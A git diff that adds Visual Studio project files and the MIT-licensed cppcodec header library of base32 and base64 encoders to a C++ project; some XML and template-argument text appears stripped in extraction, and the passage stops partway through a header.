b/Src/Common/Common.vcxitems.filters new file mode 100644 index 0000000..5754fa1 --- /dev/null +++ b/Src/Common/Common.vcxitems.filters @@ -0,0 +1,90 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Src/Common/Common.vcxitems.user b/Src/Common/Common.vcxitems.user new file mode 100644 index 0000000..966b4ff --- /dev/null +++ b/Src/Common/Common.vcxitems.user @@ -0,0 +1,6 @@ + + + + true + + \ No newline at end of file diff --git a/Src/Common/CppCodec/LICENSE b/Src/Common/CppCodec/LICENSE new file mode 100644 index 0000000..b8ff4bd --- /dev/null +++ b/Src/Common/CppCodec/LICENSE @@ -0,0 +1,21 @@ +Copyright (c) 2015 Topology Inc. +Copyright (c) 2018 Jakob Petsovits +Copyright (c) various other contributors, see individual files + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/Src/Common/CppCodec/base32_crockford.hpp b/Src/Common/CppCodec/base32_crockford.hpp new file mode 100644 index 0000000..c0ea1d9 --- /dev/null +++ b/Src/Common/CppCodec/base32_crockford.hpp @@ -0,0 +1,101 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE32_CROCKFORD +#define CPPCODEC_BASE32_CROCKFORD + +#include "detail/codec.hpp" +#include "detail/base32.hpp" + +namespace cppcodec { + +namespace detail { + +static constexpr const char base32_crockford_alphabet[] = { + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', // at index 10 + 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', // 18 - no I + 'J', 'K', // 20 - no L + 'M', 'N', // 22 - no O + 'P', 'Q', 'R', 'S', 'T', // 27 - no U + 'V', 'W', 'X', 'Y', 'Z' // 32 +}; +static_assert(sizeof(base32_crockford_alphabet) == 32, "base32 alphabet must have 32 values"); + +class base32_crockford_base +{ +public: + static inline constexpr bool generates_padding() { return false; } + static inline constexpr bool requires_padding() { return false; } + static inline constexpr bool is_padding_symbol(char /*c*/) { return false; } + + static inline constexpr char symbol(uint8_t index) + { + return base32_crockford_alphabet[index]; + } + + static inline constexpr uint8_t index_of(char c) + { + return (c >= '0' && c <= '9') ? (c - '0') + // upper-case letters + : (c >= 'A' && c <= 'H') ? (c - 'A' + 10) // no I + : (c >= 'J' && c <= 'K') ? (c - 'J' + 18) // no L + : (c >= 'M' && c <= 'N') ? (c - 'M' + 20) // no O + : (c >= 'P' && c <= 'T') ? (c - 'P' + 22) // no U + : (c >= 'V' && c <= 'Z') ? (c - 'V' + 27) + // lower-case letters + : (c >= 'a' && c <= 'h') ? (c - 'a' + 10) // no I + : (c >= 'j' && c <= 'k') ? (c - 'j' + 18) // no L + : (c >= 'm' && c <= 'n') ? (c - 'm' + 20) // no O + : (c >= 'p' && c <= 't') ? (c - 'p' + 22) // no U + : (c >= 'v' && c <= 'z') ? (c - 'v' + 27) + : (c == '-') ? 253 // "Hyphens (-) can be inserted into strings [for readability]." + : (c == '\0') ? 255 // stop at end of string + // special cases + : (c == 'O' || c == 'o') ? 0 + : (c == 'I' || c == 'i' || c == 'L' || c == 'l') ? 1 + : throw symbol_error(c); + } + + static inline constexpr bool should_ignore(uint8_t index) { return index == 253; } + static inline constexpr bool is_special_character(uint8_t index) { return index > 32; } + static inline constexpr bool is_eof(uint8_t index) { return index == 255; } +}; + +// base32_crockford is a concatenative iterative (i.e. streaming) interpretation of Crockford base32. +// It interprets the statement "zero-extend the number to make its bit-length a multiple of 5" +// to mean zero-extending it on the right. +// (The other possible interpretation is base32_crockford_num, a place-based single number encoding system. +// See http://merrigrove.blogspot.ca/2014/04/what-heck-is-base64-encoding-really.html for more info.) +class base32_crockford : public base32_crockford_base +{ +public: + template using codec_impl = stream_codec; +}; + +} // namespace detail + +using base32_crockford = detail::codec>; + +} // namespace cppcodec + +#endif // CPPCODEC_BASE32_CROCKFORD diff --git a/Src/Common/CppCodec/base32_default_crockford.hpp b/Src/Common/CppCodec/base32_default_crockford.hpp new file mode 100644 index 0000000..73e94eb --- /dev/null +++ b/Src/Common/CppCodec/base32_default_crockford.hpp @@ -0,0 +1,31 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE32_DEFAULT_CROCKFORD +#define CPPCODEC_BASE32_DEFAULT_CROCKFORD + +#include "base32_crockford.hpp" + +using base32 = cppcodec::base32_crockford; + +#endif // CPPCODEC_BASE32_DEFAULT_CROCKFORD diff --git a/Src/Common/CppCodec/base32_default_hex.hpp b/Src/Common/CppCodec/base32_default_hex.hpp new file mode 100644 index 0000000..4cd8336 --- /dev/null +++ b/Src/Common/CppCodec/base32_default_hex.hpp @@ -0,0 +1,31 @@ +/** + * Copyright (C) 2015, 2016 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE32_DEFAULT_HEX +#define CPPCODEC_BASE32_DEFAULT_HEX + +#include "base32_hex.hpp" + +using base32 = cppcodec::base32_hex; + +#endif // CPPCODEC_BASE32_DEFAULT_HEX diff --git a/Src/Common/CppCodec/base32_default_rfc4648.hpp b/Src/Common/CppCodec/base32_default_rfc4648.hpp new file mode 100644 index 0000000..75561bc --- /dev/null +++ b/Src/Common/CppCodec/base32_default_rfc4648.hpp @@ -0,0 +1,31 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE32_DEFAULT_RFC4648 +#define CPPCODEC_BASE32_DEFAULT_RFC4648 + +#include "base32_rfc4648.hpp" + +using base32 = cppcodec::base32_rfc4648; + +#endif // CPPCODEC_BASE32_DEFAULT_RFC4648 diff --git a/Src/Common/CppCodec/base32_hex.hpp b/Src/Common/CppCodec/base32_hex.hpp new file mode 100644 index 0000000..e7f4e7a --- /dev/null +++ b/Src/Common/CppCodec/base32_hex.hpp @@ -0,0 +1,79 @@ +/** + * Copyright (C) 2015, 2016 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE32_HEX +#define CPPCODEC_BASE32_HEX + +#include "detail/codec.hpp" +#include "detail/base32.hpp" + +namespace cppcodec { + +namespace detail { + +// RFC 4648 uses a simple alphabet: A-Z starting at index 0, then 2-7 starting at index 26. +static constexpr const char base32_hex_alphabet[] = { + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', + 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', + 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V' +}; +static_assert(sizeof(base32_hex_alphabet) == 32, "base32 alphabet must have 32 values"); + +class base32_hex +{ +public: + template using codec_impl = stream_codec; + + static inline constexpr bool generates_padding() { return true; } + static inline constexpr bool requires_padding() { return true; } + static inline constexpr char padding_symbol() { return '='; } + + static inline constexpr char symbol(uint8_t index) + { + return base32_hex_alphabet[index]; + } + + static inline constexpr uint8_t index_of(char c) + { + return (c >= '0' && c <= '9') ? (c - '0') + : (c >= 'A' && c <= 'V') ? (c - 'A' + 10) + : (c == padding_symbol()) ? 254 + : (c == '\0') ? 255 // stop at end of string + : (c >= 'a' && c <= 'v') ? (c - 'a' + 10) // lower-case: not expected, but accepted + : throw symbol_error(c); + } + + // RFC4648 does not specify any whitespace being allowed in base32 encodings. + static inline constexpr bool should_ignore(uint8_t /*index*/) { return false; } + static inline constexpr bool is_special_character(uint8_t index) { return index > 32; } + static inline constexpr bool is_padding_symbol(uint8_t index) { return index == 254; } + static inline constexpr bool is_eof(uint8_t index) { return index == 255; } +}; + +} // namespace detail + +using base32_hex = detail::codec>; + +} // namespace cppcodec + +#endif // CPPCODEC_BASE32_HEX diff --git a/Src/Common/CppCodec/base32_rfc4648.hpp b/Src/Common/CppCodec/base32_rfc4648.hpp new file mode 100644 index 0000000..80e17cf --- /dev/null +++ b/Src/Common/CppCodec/base32_rfc4648.hpp @@ -0,0 +1,79 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE32_RFC4648 +#define CPPCODEC_BASE32_RFC4648 + +#include "detail/codec.hpp" +#include "detail/base32.hpp" + +namespace cppcodec { + +namespace detail { + +// RFC 4648 uses a simple alphabet: A-Z starting at index 0, then 2-7 starting at index 26. +static constexpr const char base32_rfc4648_alphabet[] = { + 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', + 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', // at index 26 + '2', '3', '4', '5', '6', '7' +}; +static_assert(sizeof(base32_rfc4648_alphabet) == 32, "base32 alphabet must have 32 values"); + +class base32_rfc4648 +{ +public: + template using codec_impl = stream_codec; + + static inline constexpr bool generates_padding() { return true; } + static inline constexpr bool requires_padding() { return true; } + static inline constexpr char padding_symbol() { return '='; } + + static inline constexpr char symbol(uint8_t index) + { + return base32_rfc4648_alphabet[index]; + } + + static inline constexpr uint8_t index_of(char c) + { + return (c >= 'A' && c <= 'Z') ? (c - 'A') + : (c >= '2' && c <= '7') ? (c - '2' + 26) + : (c == padding_symbol()) ? 254 + : (c == '\0') ? 255 // stop at end of string + : (c >= 'a' && c <= 'z') ? (c - 'a') // lower-case: not expected, but accepted + : throw symbol_error(c); + } + + // RFC4648 does not specify any whitespace being allowed in base32 encodings. + static inline constexpr bool should_ignore(uint8_t /*index*/) { return false; } + static inline constexpr bool is_special_character(uint8_t index) { return index > 32; } + static inline constexpr bool is_padding_symbol(uint8_t index) { return index == 254; } + static inline constexpr bool is_eof(uint8_t index) { return index == 255; } +}; + +} // namespace detail + +using base32_rfc4648 = detail::codec>; + +} // namespace cppcodec + +#endif // CPPCODEC_BASE32_RFC4648 diff --git a/Src/Common/CppCodec/base64_default_rfc4648.hpp b/Src/Common/CppCodec/base64_default_rfc4648.hpp new file mode 100644 index 0000000..3b39a00 --- /dev/null +++ b/Src/Common/CppCodec/base64_default_rfc4648.hpp @@ -0,0 +1,31 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE64_DEFAULT_RFC4648 +#define CPPCODEC_BASE64_DEFAULT_RFC4648 + +#include "base64_rfc4648.hpp" + +using base64 = cppcodec::base64_rfc4648; + +#endif // CPPCODEC_BASE64_DEFAULT_RFC4648 diff --git a/Src/Common/CppCodec/base64_default_url.hpp b/Src/Common/CppCodec/base64_default_url.hpp new file mode 100644 index 0000000..7db2a39 --- /dev/null +++ b/Src/Common/CppCodec/base64_default_url.hpp @@ -0,0 +1,31 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE64_DEFAULT_URL +#define CPPCODEC_BASE64_DEFAULT_URL + +#include "base64_url.hpp" + +using base64 = cppcodec::base64_url; + +#endif // CPPCODEC_BASE64_DEFAULT_URL diff --git a/Src/Common/CppCodec/base64_default_url_unpadded.hpp b/Src/Common/CppCodec/base64_default_url_unpadded.hpp new file mode 100644 index 0000000..3173966 --- /dev/null +++ b/Src/Common/CppCodec/base64_default_url_unpadded.hpp @@ -0,0 +1,31 @@ +/** + * Copyright (C) 2016 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE64_DEFAULT_URL_UNPADDED +#define CPPCODEC_BASE64_DEFAULT_URL_UNPADDED + +#include "base64_url_unpadded.hpp" + +using base64 = cppcodec::base64_url_unpadded; + +#endif // CPPCODEC_BASE64_DEFAULT_URL_UNPADDED diff --git a/Src/Common/CppCodec/base64_rfc4648.hpp b/Src/Common/CppCodec/base64_rfc4648.hpp new file mode 100644 index 0000000..3027e85 --- /dev/null +++ b/Src/Common/CppCodec/base64_rfc4648.hpp @@ -0,0 +1,82 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE64_RFC4648 +#define CPPCODEC_BASE64_RFC4648 + +#include "detail/codec.hpp" +#include "detail/base64.hpp" + +namespace cppcodec { + +namespace detail { + +static constexpr const char base64_rfc4648_alphabet[] = { + 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', + 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', + 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', + 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/' +}; +static_assert(sizeof(base64_rfc4648_alphabet) == 64, "base64 alphabet must have 64 values"); + +class base64_rfc4648 +{ +public: + template using codec_impl = stream_codec; + + static inline constexpr bool generates_padding() { return true; } + static inline constexpr bool requires_padding() { return true; } + static inline constexpr char padding_symbol() { return '='; } + + static inline constexpr char symbol(uint8_t index) + { + return base64_rfc4648_alphabet[index]; + } + + static inline constexpr uint8_t index_of(char c) + { + return (c >= 'A' && c <= 'Z') ? (c - 'A') + : (c >= 'a' && c <= 'z') ? (c - 'a' + 26) + : (c >= '0' && c <= '9') ? (c - '0' + 52) + : (c == '+') ? (c - '+' + 62) + : (c == '/') ? (c - '/' + 63) + : (c == padding_symbol()) ? 254 + : (c == '\0') ? 255 // stop at end of string + : throw symbol_error(c); + } + + // RFC4648 does not specify any whitespace being allowed in base64 encodings. + static inline constexpr bool should_ignore(uint8_t /*index*/) { return false; } + static inline constexpr bool is_special_character(uint8_t index) { return index > 64; } + static inline constexpr bool is_padding_symbol(uint8_t index) { return index == 254; } + static inline constexpr bool is_eof(uint8_t index) { return index == 255; } +}; + +} // namespace detail + +using base64_rfc4648 = detail::codec>; + +} // namespace cppcodec + +#endif // CPPCODEC_BASE64_RFC4648 diff --git a/Src/Common/CppCodec/base64_url.hpp b/Src/Common/CppCodec/base64_url.hpp new file mode 100644 index 0000000..7031e20 --- /dev/null +++ b/Src/Common/CppCodec/base64_url.hpp @@ -0,0 +1,84 @@ +/** + * Copyright (C) 2015 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE64_URL +#define CPPCODEC_BASE64_URL + +#include "detail/codec.hpp" +#include "detail/base64.hpp" + +namespace cppcodec { + +namespace detail { + +// The URL and filename safe alphabet is also specified by RFC4648, named "base64url". +// We keep the underscore ("base64_url") for consistency with the other codec variants. +static constexpr const char base64_url_alphabet[] = { + 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', + 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', + 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', + 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '-', '_' +}; +static_assert(sizeof(base64_url_alphabet) == 64, "base64 alphabet must have 64 values"); + +class base64_url +{ +public: + template using codec_impl = stream_codec; + + static inline constexpr bool generates_padding() { return true; } + static inline constexpr bool requires_padding() { return true; } + static inline constexpr char padding_symbol() { return '='; } + + static inline constexpr char symbol(uint8_t index) + { + return base64_url_alphabet[index]; + } + + static inline constexpr uint8_t index_of(char c) + { + return (c >= 'A' && c <= 'Z') ? (c - 'A') + : (c >= 'a' && c <= 'z') ? (c - 'a' + 26) + : (c >= '0' && c <= '9') ? (c - '0' + 52) + : (c == '-') ? (c - '-' + 62) + : (c == '_') ? (c - '_' + 63) + : (c == padding_symbol()) ? 254 + : (c == '\0') ? 255 // stop at end of string + : throw symbol_error(c); + } + + // RFC4648 does not specify any whitespace being allowed in base64 encodings. + static inline constexpr bool should_ignore(uint8_t /*index*/) { return false; } + static inline constexpr bool is_special_character(uint8_t index) { return index > 64; } + static inline constexpr bool is_padding_symbol(uint8_t index) { return index == 254; } + static inline constexpr bool is_eof(uint8_t index) { return index == 255; } +}; + +} // namespace detail + +using base64_url = detail::codec>; + +} // namespace cppcodec + +#endif // CPPCODEC_BASE64_URL diff --git a/Src/Common/CppCodec/base64_url_unpadded.hpp b/Src/Common/CppCodec/base64_url_unpadded.hpp new file mode 100644 index 0000000..d525cf1 --- /dev/null +++ b/Src/Common/CppCodec/base64_url_unpadded.hpp @@ -0,0 +1,48 @@ +/** + * Copyright (C) 2016 Topology LP + * All rights reserved. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + */ + +#ifndef CPPCODEC_BASE64_URL_UNPADDED +#define CPPCODEC_BASE64_URL_UNPADDED + +#include "base64_url.hpp" + +namespace cppcodec { + +namespace detail { + +class base64_url_unpadded : public base64_url +{ +public: + template using codec_impl = stream_codec; + + static inline constexpr bool generates_padding() { return false; } + static inline constexpr bool requires_padding() { return false; } +}; + 